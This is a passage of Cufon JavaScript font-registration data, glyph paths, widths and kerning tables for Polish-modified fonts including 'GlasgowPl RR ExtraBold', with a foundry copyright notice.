-74r0,-170r19,0r0,170v-1,35,20,57,54,57xm127,-297r-54,36r-10,-10r48,-43","w":190},"\u00db":{"d":"95,-13v34,0,55,-22,55,-57r0,-170r19,0r0,170v3,49,-30,74,-74,74v-44,0,-73,-26,-73,-74r0,-170r19,0r0,170v-1,35,20,57,54,57xm138,-277r-6,12r-38,-22r-38,22r-7,-10r45,-35","w":190},"\u00d9":{"d":"95,-13v34,0,55,-22,55,-57r0,-170r19,0r0,170v3,49,-30,74,-74,74v-44,0,-73,-26,-73,-74r0,-170r19,0r0,170v-1,35,20,57,54,57xm124,-271r-10,10r-55,-36r16,-17","w":190},"\u0131":{"d":"40,0r-18,0r0,-163r18,-4r0,167","w":61},"\u00b8":{"d":"10,17v14,-11,40,-9,41,11v0,15,-13,26,-39,32r0,-11v14,-4,22,-9,22,-17v0,-11,-13,-7,-24,-3r0,-12","w":60},"\u0160":{"d":"30,-182v3,64,116,47,112,120v-3,62,-78,83,-131,50r7,-16v41,26,103,19,103,-32v0,-67,-110,-47,-110,-121v0,-52,62,-77,113,-54r-6,16v-37,-19,-90,-4,-88,37xm126,-298r-45,35r-44,-38r7,-10r37,22r39,-22","w":152},"\u0161":{"d":"110,-140v-31,-21,-94,-12,-74,28v23,24,85,33,85,73v0,49,-69,53,-111,31r8,-17v30,18,75,20,83,-13v-11,-42,-90,-38,-90,-89v0,-44,65,-51,106,-29xm114,-224r-44,35r-45,-37r7,-11r38,23r38,-23","w":130},"\u017d":{"d":"135,0r-133,0r0,-15r111,-210r-103,-2r0,-13r125,0r0,15r-111,209r111,2r0,14xm119,-298r-45,35r-44,-38r6,-10r38,22r38,-22","w":140},"\u017e":{"d":"126,0r-124,0r0,-12r98,-136r-94,-3r0,-12r119,0r0,11r-97,137r98,2r0,13xm109,-224r-44,35r-45,-37r7,-11r38,23r38,-23","w":129},"\u00dd":{"d":"156,-240r-72,137r0,103r-20,0r0,-103r-71,-137r23,0r58,119r58,-119r24,0xm110,-297r-53,36r-11,-10r48,-43","w":149},"\u00ad":{"d":"134,-51r-121,0r0,-17r121,0r0,17","w":147},"\u2212":{"d":"134,-51r-121,0r0,-17r121,0r0,17","w":147},"\u00a4":{"d":"202,-181v30,33,29,84,0,118v7,9,26,17,12,28r-21,-21v-31,30,-86,29,-118,1r-20,20r-8,-9r20,-19v-28,-32,-28,-88,0,-118r-20,-20r8,-9r20,21v33,-30,86,-31,118,0r20,-21r9,9xm134,-46v40,0,76,-35,76,-76v0,-41,-35,-76,-76,-76v-41,0,-75,36,-75,76v0,40,35,76,75,76","w":270},"\u015a":{"d":"30,-182v3,64,116,47,112,120v-3,62,-78,83,-131,50r7,-16v41,26,103,19,103,-32v0,-67,-110,-47,-110,-121v0,-52,62,-77,113,-54r-6,16v-37,-19,-90,-4,-88,37xm105,-298r-53,36r-10,-9r47,-43","w":152},"\u015b":{"d":"110,-140v-31,-21,-94,-12,-74,28v23,24,85,33,85,73v0,49,-69,53,-111,31r8,-17v30,18,75,20,83,-13v-11,-42,-90,-38,-90,-89v0,-44,65,-51,106,-29xm95,-223r-53,36r-10,-9r47,-43","w":130},"\u0179":{"d":"135,0r-133,0r0,-15r111,-210r-103,-2r0,-13r125,0r0,15r-111,209r111,2r0,14xm107,-298r-53,36r-10,-9r47,-43","w":140},"\u017a":{"d":"126,0r-124,0r0,-12r98,-136r-94,-3r0,-12r119,0r0,11r-97,137r98,2r0,13xm98,-223r-53,36r-10,-9r47,-43","w":129},"\u017b":{"d":"135,0r-133,0r0,-15r111,-210r-103,-2r0,-13r125,0r0,15r-111,209r111,2r0,14xm73,-304v7,0,12,8,12,17v0,9,-5,17,-12,17v-15,-1,-15,-33,0,-34","w":140},"\u017c":{"d":"69,-239v15,1,15,33,0,34v-17,0,-17,-34,0,-34xm126,0r-124,0r0,-12r98,-136r-94,-3r0,-12r119,0r0,11r-97,137r98,2r0,13","w":129},"\u0104":{"d":"136,26v0,15,20,11,30,7r0,14v-18,12,-49,9,-49,-15v0,-14,8,-25,22,-33r-27,-93r-69,0r-26,94r-21,0r71,-240r21,0r71,240v-13,5,-23,12,-23,26xm108,-108r-31,-109r-30,109r61,0","w":155,"k":{"\u00ea":-6,"\u00a5":-18,"\u00b9":-12,"o":-7,"e":-6,"a":-12,"W":10,"T":29,"A":-18,"\u0105":-12,"\u0119":-6,"\u0104":-18,"\u00c1":-18,"\u00c2":-18,"\u2019":24,"\u201d":24,"\u00c3":-18,"\u00c0":-18,"\u2026":-23,"\u00f8":-7,"\u2122":19,"\u00ae":12,"\u00df":-2,"\u00fc":-6,"\u00fb":-6,"\u00f9":-6,"\u00fa":-6,"\u00f5":-7,"\u00f6":-7,"\u00f4":-7,"\u00f2":-7,"\u00f3":-7,"\u00ef":-2,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00eb":-6,"\u00e8":-6,"\u00e9":-6,"\u00e7":-6,"\u00e5":-12,"\u00e3":-12,"\u00e4":-12,"\u00e2":-12,"\u00e0":-12,"\u00e1":-12,"\u00c5":-18,"\u00c4":-18,"z":-14,"x":-14,"v":2,"u":-6,"t":-6,"s":-8,"r":-2,"q":-7,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"j":-5,"i":-2,"h":-2,"g":-12,"f":-2,"d":-7,"c":-6,"b":-2,"Z":-15,"Y":25,"X":-13,"V":13,"S":-5,"M":-7,"J":-2,"?":-10,";":-23,":":-23,"\/":-22,".":-23,",":-23,"*":19,"!":-10}},"\u0141":{"d":"86,-156r-45,15r0,124r86,5r0,12r-105,0r0,-135r-18,6r0,-17r18,-6r0,-88r19,0r0,82r45,-15r0,17","w":127,"k":{"\u00ea":8,"\u00c6":13,"\u00a5":-19,"\u00b9":-4,"o":5,"e":8,"a":-4,"W":14,"T":31,"O":13,"C":13,"A":-19,"\u0105":-4,"\u0119":8,"\u0106":13,"\u0104":-19,"\u00d9":8,"\u00db":8,"\u00da":8,"\u00d2":13,"\u00d4":13,"\u00d3":13,"\u00c1":-19,"\u00c2":-19,"\u00ff":10,"\u2019":24,"\u201d":24,"\u2014":10,"\u2013":10,"\u00d5":13,"\u00c3":-19,"\u00c0":-19,"\u2026":-18,"\u00f8":5,"\u00d8":13,"\u2122":36,"\u00ae":24,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":5,"\u00f6":5,"\u00f4":5,"\u00f2":5,"\u00f3":5,"\u00eb":8,"\u00e8":8,"\u00e9":8,"\u00e5":-4,"\u00e3":-4,"\u00e4":-4,"\u00e2":-4,"\u00e0":-4,"\u00e1":-4,"\u00dc":8,"\u00d6":13,"\u00c7":13,"\u00c5":-19,"\u00c4":-19,"y":10,"w":10,"u":2,"Z":-17,"Y":32,"V":22,"U":8,"S":-7,"Q":13,"M":-10,"G":13,"?":-7,";":-18,":":-18,"\/":-17,".":-18,"-":10,",":-18,"*":46,"!":-7}},"\u0142":{"d":"40,0r-18,0r0,-137r-18,4r0,-17r18,-5r0,-84r18,-4r0,83r18,-5r0,17r-18,5r0,143","w":61},"\u0106":{"d":"36,-115v0,57,12,101,57,103v14,0,30,-5,47,-14r5,15v-75,39,-131,2,-131,-106v0,-91,45,-151,125,-115r-4,15v-67,-31,-100,3,-99,102xm119,-298r-53,36r-10,-9r47,-43","w":146,"k":{"\u00ea":7,"\u00c6":13,"\u00a5":-12,"\u00b9":-2,"o":4,"e":7,"a":-2,"T":-8,"O":13,"C":13,"A":-12,"\u0105":-2,"\u0119":7,"\u0106":13,"\u0104":-12,"\u00d2":13,"\u00d4":13,"\u00d3":13,"\u00c1":-12,"\u00c2":-12,"\u00ff":7,"\u2019":-5,"\u201d":-5,"\u00d5":13,"\u00c3":-12,"\u00c0":-12,"\u2026":-14,"\u00f8":4,"\u00d8":13,"\u2122":-12,"\u00ae":12,"\u00fc":1,"\u00fb":1,"\u00f9":1,"\u00fa":1,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00ef":-14,"\u00ee":-10,"\u00ec":-22,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"\u00d6":13,"\u00c7":13,"\u00c5":-12,"\u00c4":-12,"y":7,"u":1,"l":-1,"k":-1,"j":-1,"i":-1,"h":-1,"b":-1,"Y":-11,"S":-2,"Q":13,"G":13,"?":-7,";":-14,":":-14,"\/":-15,".":-14,",":-14,"*":-6,"!":-7}},"\u0107":{"d":"35,-81v0,57,47,90,85,50r7,17v-51,43,-113,3,-113,-66v0,-70,60,-113,113,-69r-8,15v-40,-37,-84,-4,-84,53xm108,-223r-53,36r-10,-9r47,-43","w":132},"\u0144":{"d":"40,-150v33,-28,103,-27,103,36r0,114r-18,0v-7,-56,24,-152,-37,-152v-15,-1,-37,9,-48,19r0,133r-18,0r0,-163r18,-4r0,17xm114,-223r-53,36r-10,-9r47,-43","w":164},"\u0143":{"d":"171,0r-23,0r-107,-205r0,205r-19,0r0,-240r22,0r107,206r0,-206r20,0r0,240xm128,-298r-53,36r-10,-9r47,-43","w":192},"\u0118":{"d":"97,26v0,17,20,9,30,7r0,14v-48,30,-66,-31,-30,-47r-75,0r0,-240r112,0r0,13r-93,4r0,92r86,0r0,14r-86,0r0,100r95,4r0,13v-23,-2,-38,7,-39,26","w":146},"\u0119":{"d":"95,26v0,16,20,11,30,7r0,14v-18,12,-48,9,-49,-15v-1,-11,9,-23,14,-29v-50,-1,-76,-34,-76,-87v-1,-48,23,-83,68,-83v47,-1,70,40,64,91r-110,0v1,60,49,75,99,54r5,16v-19,8,-45,8,-45,32xm126,-91v6,-58,-48,-77,-78,-45v-9,9,-13,26,-13,45r91,0","w":158},"\u0105":{"d":"109,26v0,16,20,11,30,7r0,14v-18,12,-49,9,-49,-15v0,-17,10,-28,24,-35r0,-13v-38,34,-105,24,-106,-31v0,-50,53,-66,105,-51v2,-33,-1,-54,-36,-53v-13,0,-28,4,-47,11r-7,-17v47,-14,109,-23,109,36r0,121v-13,5,-22,12,-23,26xm30,-48v0,43,58,44,83,15r0,-50v-39,-12,-83,-4,-83,35"},"\u00b9":{"d":"109,26v0,16,20,11,30,7r0,14v-18,12,-49,9,-49,-15v0,-17,10,-28,24,-35r0,-13v-38,34,-105,24,-106,-31v0,-50,53,-66,105,-51v2,-33,-1,-54,-36,-53v-13,0,-28,4,-47,11r-7,-17v47,-14,109,-23,109,36r0,121v-13,5,-22,12,-23,26xm30,-48v0,43,58,44,83,15r0,-50v-39,-12,-83,-4,-83,35"},"\u00a5":{"d":"136,26v0,15,20,11,30,7r0,14v-18,12,-49,9,-49,-15v0,-14,8,-25,22,-33r-27,-93r-69,0r-26,94r-21,0r71,-240r21,0r71,240v-13,5,-23,12,-23,26xm108,-108r-31,-109r-30,109r61,0","w":155,"k":{"\u0105":-12,"\u0119":-6,"\u0104":-18,"\u00c1":-18,"\u00c2":-18,"\u2019":24,"\u201d":24,"\u00c3":-18,"\u00c0":-18,"\u2026":-23,"\u00f8":-7,"\u2122":19,"\u00ae":12,"\u00df":-2,"\u00fc":-6,"\u00fb":-6,"\u00f9":-6,"\u00fa":-6,"\u00f5":-7,"\u00f6":-7,"\u00f4":-7,"\u00f2":-7,"\u00f3":-7,"\u00ef":-2,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00eb":-6,"\u00e8":-6,"\u00e9":-6,"\u00e7":-6,"\u00e5":-12,"\u00e3":-12,"\u00e4":-12,"\u00e2":-12,"\u00e0":-12,"\u00e1":-12,"\u00c5":-18,"\u00c4":-18,"z":-14,"x":-14,"v":2,"u":-6,"t":-6,"s":-8,"r":-2,"q":-7,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"j":-5,"i":-2,"h":-2,"g":-12,"f":-2,"d":-7,"c":-6,"b":-2,"Z":-15,"Y":25,"X":-13,"V":13,"S":-5,"M":-7,"J":-2,"?":-10,";":-23,":":-23,"\/":-22,".":-23,",":-23,"*":19,"!":-10,"A":-18,"\u00a5":-18,"T":29,"W":10,"a":-12,"\u00b9":-12,"e":-6,"\u00ea":-6,"o":-7}},"\u00e6":{"d":"35,-81v0,57,47,90,85,50r7,17v-51,43,-113,3,-113,-66v0,-70,60,-113,113,-69r-8,15v-40,-37,-84,-4,-84,53xm108,-223r-53,36r-10,-9r47,-43","w":132},"\u00c6":{"d":"36,-115v0,57,12,101,57,103v14,0,30,-5,47,-14r5,15v-75,39,-131,2,-131,-106v0,-91,45,-151,125,-115r-4,15v-67,-31,-100,3,-99,102xm119,-298r-53,36r-10,-9r47,-43","w":146,"k":{"\u0105":-2,"\u0119":7,"\u0106":13,"\u0104":-12,"\u00d2":13,"\u00d4":13,"\u00d3":13,"\u00c1":-12,"\u00c2":-12,"\u00ff":7,"\u2019":-5,"\u201d":-5,"\u00d5":13,"\u00c3":-12,"\u00c0":-12,"\u2026":-14,"\u00f8":4,"\u00d8":13,"\u2122":-12,"\u00ae":12,"\u00fc":1,"\u00fb":1,"\u00f9":1,"\u00fa":1,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00ef":-14,"\u00ee":-10,"\u00ec":-22,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"\u00d6":13,"\u00c7":13,"\u00c5":-12,"\u00c4":-12,"y":7,"u":1,"l":-1,"k":-1,"j":-1,"i":-1,"h":-1,"b":-1,"Y":-11,"S":-2,"Q":13,"G":13,"?":-7,";":-14,":":-14,"\/":-15,".":-14,",":-14,"*":-6,"!":-7,"A":-12,"\u00a5":-12,"T":-8,"a":-2,"\u00b9":-2,"e":7,"\u00ea":7,"o":4,"C":13,"\u00c6":13,"O":13}},"\u00ea":{"d":"95,26v0,16,20,11,30,7r0,14v-18,12,-48,9,-49,-15v-1,-11,9,-23,14,-29v-50,-1,-76,-34,-76,-87v-1,-48,23,-83,68,-83v47,-1,70,40,64,91r-110,0v1,60,49,75,99,54r5,16v-19,8,-45,8,-45,32xm126,-91v6,-58,-48,-77,-78,-45v-9,9,-13,26,-13,45r91,0","w":158},"\u00ca":{"d":"97,26v0,17,20,9,30,7r0,14v-48,30,-66,-31,-30,-47r-75,0r0,-240r112,0r0,13r-93,4r0,92r86,0r0,14r-86,0r0,100r95,4r0,13v-23,-2,-38,7,-39,26","w":146},"\u00b3":{"d":"40,0r-18,0r0,-137r-18,4r0,-17r18,-5r0,-84r18,-4r0,83r18,-5r0,17r-18,5r0,143","w":61},"\u00a3":{"d":"86,-156r-45,15r0,124r86,5r0,12r-105,0r0,-135r-18,6r0,-17r18,-6r0,-88r19,0r0,82r45,-15r0,17","w":127,"k":{"\u0105":-4,"\u0119":8,"\u0106":13,"\u0104":-19,"\u00d9":8,"\u00db":8,"\u00da":8,"\u00d2":13,"\u00d4":13,"\u00d3":13,"\u00c1":-19,"\u00c2":-19,"\u00ff":10,"\u2019":24,"\u201d":24,"\u2014":10,"\u2013":10,"\u00d5":13,"\u00c3":-19,"\u00c0":-19,"\u2026":-18,"\u00f8":5,"\u00d8":13,"\u2122":36,"\u00ae":24,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":5,"\u00f6":5,"\u00f4":5,"\u00f2":5,"\u00f3":5,"\u00eb":8,"\u00e8":8,"\u00e9":8,"\u00e5":-4,"\u00e3":-4,"\u00e4":-4,"\u00e2":-4,"\u00e0":-4,"\u00e1":-4,"\u00dc":8,"\u00d6":13,"\u00c7":13,"\u00c5":-19,"\u00c4":-19,"y":10,"w":10,"u":2,"Z":-17,"Y":32,"V":22,"U":8,"S":-7,"Q":13,"M":-10,"G":13,"?":-7,";":-18,":":-18,"\/":-17,".":-18,"-":10,",":-18,"*":46,"!":-7,"A":-19,"\u00a5":-19,"T":31,"W":14,"a":-4,"\u00b9":-4,"e":8,"\u00ea":8,"o":5,"C":13,"\u00c6":13,"O":13}},"\u00f1":{"d":"40,-150v33,-28,103,-27,103,36r0,114r-18,0v-7,-56,24,-152,-37,-152v-15,-1,-37,9,-48,19r0,133r-18,0r0,-163r18,-4r0,17xm114,-223r-53,36r-10,-9r47,-43","w":164},"\u00d1":{"d":"171,0r-23,0r-107,-205r0,205r-19,0r0,-240r22,0r107,206r0,-206r20,0r0,240xm128,-298r-53,36r-10,-9r47,-43","w":192},"\u0153":{"d":"110,-140v-31,-21,-94,-12,-74,28v23,24,85,33,85,73v0,49,-69,53,-111,31r8,-17v30,18,75,20,83,-13v-11,-42,-90,-38,-90,-89v0,-44,65,-51,106,-29xm95,-223r-53,36r-10,-9r47,-43","w":130},"\u0152":{"d":"30,-182v3,64,116,47,112,120v-3,62,-78,83,-131,50r7,-16v41,26,103,19,103,-32v0,-67,-110,-47,-110,-121v0,-52,62,-77,113,-54r-6,16v-37,-19,-90,-4,-88,37xm105,-298r-53,36r-10,-9r47,-43","w":152},"\u0178":{"d":"126,0r-124,0r0,-12r98,-136r-94,-3r0,-12r119,0r0,11r-97,137r98,2r0,13xm98,-223r-53,36r-10,-9r47,-43","w":129},"\u00bf":{"d":"69,-239v15,1,15,33,0,34v-17,0,-17,-34,0,-34xm126,0r-124,0r0,-12r98,-136r-94,-3r0,-12r119,0r0,11r-97,137r98,2r0,13","w":129},"\u00af":{"d":"135,0r-133,0r0,-15r111,-210r-103,-2r0,-13r125,0r0,15r-111,209r111,2r0,14xm73,-304v7,0,12,8,12,17v0,9,-5,17,-12,17v-15,-1,-15,-33,0,-34","w":140},"\u00a0":{"w":90}}});
/*!
 * The following copyright notice may not be removed under any circumstances.
 *
 * Copyright:
 * Licencja dla: Endorfine s.c. Polish modification by Pawel Kenig, KENTYPE, 2008.
 * Copyright (c) 1999, Rabbit Reproductions Typefoundry. All rights reserved. Data
 * Copyright (c) 1999 dtpTypes Limited.
 */
Cufon.registerFont({"w":182,"face":{"font-family":"GlasgowPl RR ExtraBold","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"0 0 8 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"5","bbox":"-20 -329 355 102","underline-thickness":"26.3672","underline-position":"-28.6523","unicode-range":"U+0020-U+2122"},"glyphs":{" ":{"w":72},"!":{"d":"101,-240r-20,176r-44,0r-20,-176r84,0xm21,-22v2,-36,74,-35,76,0v-2,34,-76,35,-76,0","w":113,"k":{"\u2019":4,"\u201d":4}},"\"":{"d":"158,-240r-52,97r-30,-8r19,-89r63,0xm86,-240r-52,97r-30,-8r19,-89r63,0","w":158},"#":{"d":"162,-205r-5,30r-27,0r-4,24r27,0r-6,30r-26,0r-7,35r-31,0r6,-35r-19,0r-6,35r-31,0r6,-35r-27,0r5,-30r27,0r5,-24r-27,0r5,-30r27,0r6,-35r31,0r-6,35r19,0r6,-35r32,0r-7,35r27,0xm99,-175r-19,0r-5,24r20,0","w":161},"$":{"d":"118,-243v19,0,36,7,53,11r-16,55v-20,-8,-36,-12,-50,-12v-28,0,-30,18,-7,28v38,16,83,30,82,81v-1,41,-28,70,-62,80r0,22r-43,0r0,-17v-18,-1,-40,-5,-66,-12r15,-57v20,8,38,12,52,12v23,2,35,-16,19,-25v-33,-18,-91,-35,-88,-88v2,-44,28,-70,68,-77r0,-20r43,0r0,19","w":186,"k":{"9":10,"8":-2,"7":8,"6":-1,"5":7,"4":2,"2":2,"1":7}},"%":{"d":"220,-120v43,0,66,17,66,63v0,46,-23,63,-66,63v-41,0,-65,-18,-65,-62v0,-47,21,-64,65,-64xm274,-240r-207,240r-48,0r207,-240r48,0xm5,-181v-1,-44,22,-63,65,-64v44,0,66,21,66,63v0,45,-22,63,-66,64v-44,0,-65,-21,-65,-63xm230,-57v0,-15,-3,-22,-10,-22v-6,0,-10,7,-10,22v0,15,4,22,10,22v7,0,10,-7,10,-22xm80,-182v0,-15,-4,-22,-10,-22v-6,0,-9,7,-9,22v0,15,3,23,9,23v6,0,10,-8,10,-23","w":290},"&":{"d":"217,-89v-8,11,-5,10,-17,22r31,27r-45,44r-31,-24v-46,50,-154,28,-151,-47v2,-34,17,-48,42,-64v-39,-55,-2,-116,67,-113v40,2,72,19,72,58v0,23,-15,43,-45,62v8,10,13,14,22,22v8,-6,11,-11,19,-20xm109,-198v-20,0,-20,24,-6,38v13,-8,20,-15,20,-24v0,-9,-5,-14,-14,-14xm79,-90v-21,13,-9,43,13,40v33,-4,5,-20,-5,-32","w":211},"'":{"d":"86,-240r-52,97r-30,-8r19,-89r63,0","w":86},"(":{"d":"109,-267v-42,71,-41,221,0,294r-10,9v-66,-52,-122,-153,-62,-242v18,-28,36,-47,62,-69","w":113},")":{"d":"15,-275v67,55,118,151,62,240v-18,27,-36,46,-62,70r-10,-8v41,-74,40,-218,0,-293","w":113},"*":{"d":"123,-193r-36,12r36,11r-21,34r-28,-26r11,36r-40,0r8,-37r-29,26r-19,-35r36,-10r-36,-13r20,-34r28,26r-8,-37r39,0r-9,37r29,-24","w":128},"+":{"d":"148,-47r-48,0r0,47r-48,0r0,-47r-48,0r0,-48r48,0r0,-49r48,0r0,49r48,0r0,48","w":151},",":{"d":"81,-50r-52,97r-30,-9r19,-88r63,0","w":86,"k":{"\u2019":29,"\u201d":29,"9":17,"7":5,"6":7,"0":14,"*":31}},"-":{"d":"96,-64r-84,0r0,-51r84,0r0,51","w":107,"k":{"\u00ea":-5,"\u00c6":-5,"\u00b9":-4,"o":-5,"e":-5,"a":-4,"W":6,"T":33,"O":-5,"C":-5,"\u0106":-5,"\u0119":-5,"\u0105":-4,"\u00d3":-5,"\u00f3":-5,"z":7,"x":10,"s":-2,"q":-5,"g":-5,"d":-5,"c":-5,"Z":6,"Y":33,"X":6,"V":12,"S":11,"Q":-5,"M":-4,"G":-5,"9":13,"8":-5,"7":17,"6":-7,"5":7,"4":-5,"3":7,"2":12,"1":19,"0":-6}},"\u2010":{"d":"96,-64r-84,0r0,-51r84,0r0,51","w":107},".":{"d":"6,-22v1,-35,74,-36,75,0v-2,34,-75,35,-75,0","w":87,"k":{"\u2019":29,"\u201d":29,"9":13,"7":-4,"6":10,"4":5,"3":-4,"2":-4,"1":-1,"0":15,"*":31}},"\/":{"d":"146,-243r-91,248r-43,0r90,-248r44,0","w":157,"k":{"\u00ea":33,"\u00c6":17,"\u00a5":26,"\u00b9":36,"o":31,"e":33,"a":36,"W":-17,"T":-14,"O":18,"C":17,"A":26,"\u0106":17,"\u0119":33,"\u0105":36,"\u0104":26,"\u00d3":18,"\u00f3":31,"z":10,"y":7,"x":12,"w":6,"v":6,"u":22,"t":7,"s":24,"r":22,"q":33,"p":22,"n":22,"m":22,"j":7,"i":7,"g":28,"f":7,"d":33,"c":33,"Z":-12,"Y":-18,"X":-12,"V":-17,"S":5,"Q":18,"M":17,"G":18,"9":10,"8":13,"7":-7,"6":25,"5":11,"4":31,"3":-5,"2":5,"1":7,"0":18}},"0":{"d":"99,-245v64,0,91,55,91,125v0,70,-28,126,-91,126v-63,0,-92,-55,-92,-124v0,-72,27,-127,92,-127xm109,-175v-1,-21,-20,-18,-20,0v0,20,-1,90,0,110v1,21,21,17,20,0v2,-15,1,-89,0,-110","w":197,"k":{"\u2026":15,"\u00b0":6,"7":13,"5":7,"4":6,"3":5,"2":14,"1":5,"0":-1,"\/":15,".":15,"-":-6,",":15}},"1":{"d":"187,0r-173,0r0,-60r47,0r0,-92r-47,9r-10,-37r100,-60r36,0r0,180r47,0r0,60","w":190,"k":{"\u2026":-12,"\u00a2":22,"\u00b0":29,"9":17,"7":2,"6":7,"5":2,"4":5,"2":2,"1":5,"0":12,"\/":-12,".":-12,"-":10,",":-12,"%":14}},"2":{"d":"176,-178v2,43,-48,98,-80,125r83,4r0,49r-169,0r0,-46v34,-33,81,-76,87,-115v-7,-33,-44,-19,-70,-1r-17,-53v63,-41,160,-46,166,37","w":185,"k":{"\u2026":-6,"\u00a2":5,"\u00b0":-2,"9":-1,"7":2,"6":8,"5":4,"4":7,"3":-3,"2":5,"1":4,"0":4,"\/":-2,".":-6,"-":17,",":-6,"%":-2}},"3":{"d":"108,-130v27,4,48,23,48,53v-2,60,-68,86,-138,81r-12,-54v40,1,72,-7,70,-29v-2,-21,-32,-25,-56,-20r0,-50v32,1,66,-3,63,-23v-3,-23,-46,-19,-68,-9r-13,-52v61,-19,150,-20,150,44v0,25,-14,45,-44,59","w":163,"k":{"\u2026":11,"\u00a2":4,"9":2,"8":-1,"7":6,"5":10,"4":4,"3":4,"2":9,"1":5,"0":1,"\/":11,".":11,"-":-6,",":11}},"4":{"d":"200,-36r-19,0r0,36r-78,0r0,-36r-93,0r0,-42r67,-162r77,0r-66,152r23,0r27,-93r43,0r0,93r19,0r0,52","w":205,"k":{"\u00a2":12,"\u00b0":12,"9":11,"8":-1,"7":10,"5":6,"4":2,"3":4,"2":5,"1":10,"0":4,"\/":2,"-":-10,"%":7}},"5":{"d":"91,-152v45,-2,76,24,76,66v0,63,-73,94,-146,91r-14,-51v38,-2,75,-9,80,-38v-3,-25,-37,-30,-69,-26r8,-130r132,0r0,49r-67,5r0,34","w":169,"k":{"\u2026":10,"9":5,"8":-4,"7":5,"6":-4,"5":6,"4":-1,"2":7,"1":10,"0":-2,"\/":10,".":10,"-":-12,",":10}},"6":{"d":"83,-131v47,-24,93,9,93,61v0,46,-35,75,-84,75v-99,0,-104,-143,-50,-198v24,-25,58,-42,103,-50r15,44v-36,10,-71,33,-77,68xm80,-91v-8,25,23,72,32,33v0,-17,-13,-39,-32,-33","w":180,"k":{"\u2026":2,"\u00a2":5,"\u00b0":10,"9":15,"8":-4,"7":8,"6":-1,"5":7,"3":5,"2":7,"1":8,"0":1,"\/":5,".":2,"-":-7,",":4,"%":10}},"7":{"d":"171,-209r-77,209r-89,0r76,-184r-74,-7r0,-49r164,0r0,31","w":170,"k":{"\u2026":50,"\u00a2":7,"\u00b0":-12,"8":2,"7":-5,"6":18,"5":7,"4":31,"3":-7,"1":5,"0":7,"\/":41,".":50,"-":24,",":48,"%":-6}},"8":{"d":"143,-135v16,12,35,40,35,63v0,48,-41,77,-90,77v-74,0,-113,-83,-53,-122v-54,-46,-18,-127,57,-127v65,0,102,69,51,109xm103,-153v10,-13,9,-39,-9,-41v-24,5,-12,33,9,41xm89,-51v36,-4,10,-34,-6,-39r-9,-5v-10,19,-9,47,15,44","k":{"\u2026":2,"\u00a2":4,"\u00b0":5,"9":6,"8":-2,"7":10,"6":-2,"5":6,"4":1,"3":5,"2":7,"1":7,"\/":6,".":2,"-":-6,",":2,"%":4}},"9":{"d":"89,-244v55,0,86,43,85,99v0,82,-46,132,-138,150r-15,-45v35,-11,70,-31,77,-68v-43,24,-93,-8,-93,-59v0,-47,35,-77,84,-77xm69,-181v0,19,13,40,33,34v1,-21,-5,-46,-21,-48v-8,0,-12,4,-12,14","w":181,"k":{"\u2026":38,"\u00b0":5,"8":4,"7":11,"6":2,"5":7,"4":12,"3":7,"2":17,"1":4,"\/":23,".":38,"-":-1,",":38,"%":-1}},":":{"d":"10,-135v1,-35,74,-35,75,0v-2,34,-75,35,-75,0xm10,-22v1,-35,74,-35,75,0v-2,34,-75,35,-75,0","w":94,"k":{"*":7}},";":{"d":"12,-135v1,-35,74,-35,75,0v-2,34,-75,35,-75,0xm78,-50r-51,97r-31,-9r19,-88r63,0","w":92,"k":{"*":5}},"<":{"d":"99,-120v4,7,20,13,14,20r-17,-17v-7,4,-13,20,-20,14r16,-17v-4,-7,-19,-13,-13,-20r17,17v7,-4,13,-20,20,-14","w":191},"=":{"d":"148,-80r-144,0r0,-43r144,0r0,43xm148,-20r-144,0r0,-42r144,0r0,42","w":151},">":{"d":"99,-120v4,7,20,13,14,20r-17,-17v-7,4,-13,20,-20,14r16,-17v-4,-7,-19,-13,-13,-20r17,17v7,-4,13,-20,20,-14","w":191},"?":{"d":"12,-234v55,-19,129,-15,130,45v1,58,-61,68,-59,125r-50,0v-16,-50,27,-75,35,-111v-1,-20,-24,-16,-43,-10xm20,-22v1,-35,75,-36,76,0v-2,34,-76,35,-76,0","w":151},"@":{"d":"177,-253v81,0,142,47,142,124v0,68,-87,111,-118,52v-26,45,-93,27,-93,-29v0,-51,47,-100,98,-75r1,-8r36,0r-14,95v0,13,11,27,25,26v26,0,41,-27,41,-55v0,-66,-48,-110,-114,-110v-65,0,-116,47,-116,112v0,92,113,145,191,94r9,16v-96,59,-236,5,-236,-109v0,-80,66,-133,148,-133xm204,-166v-33,-22,-57,19,-57,55v0,35,25,45,41,25v14,-18,11,-53,16,-80","w":347},"A":{"d":"211,0r-80,0r-9,-53r-39,0r-9,53r-80,0r59,-240r100,0xm114,-106r-11,-73r-12,73r23,0","w":205,"k":{"\u0106":4,"\u0105":-7,"\u0104":-17,"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":4,"\u00d4":4,"\u00d3":4,"\u00c1":-17,"\u00c2":-17,"\u00ff":7,"\u2019":18,"\u201d":18,"\u00d5":4,"\u00c3":-17,"\u00c0":-17,"\u2026":-13,"\u00f8":-2,"\u00d8":4,"\u2122":19,"\u00ae":12,"\u00df":-2,"\u00f5":-2,"\u00f6":-2,"\u00f4":-2,"\u00f2":-2,"\u00f3":-2,"\u00ef":-2,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00e7":-2,"\u00e5":-7,"\u00e3":-7,"\u00e4":-7,"\u00e2":-7,"\u00e0":-7,"\u00e1":-7,"\u00dc":4,"\u00d6":4,"\u00c7":4,"\u00c5":-17,"\u00c4":-17,"z":-14,"y":7,"x":-14,"w":5,"v":7,"t":1,"s":-8,"r":-2,"q":-2,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2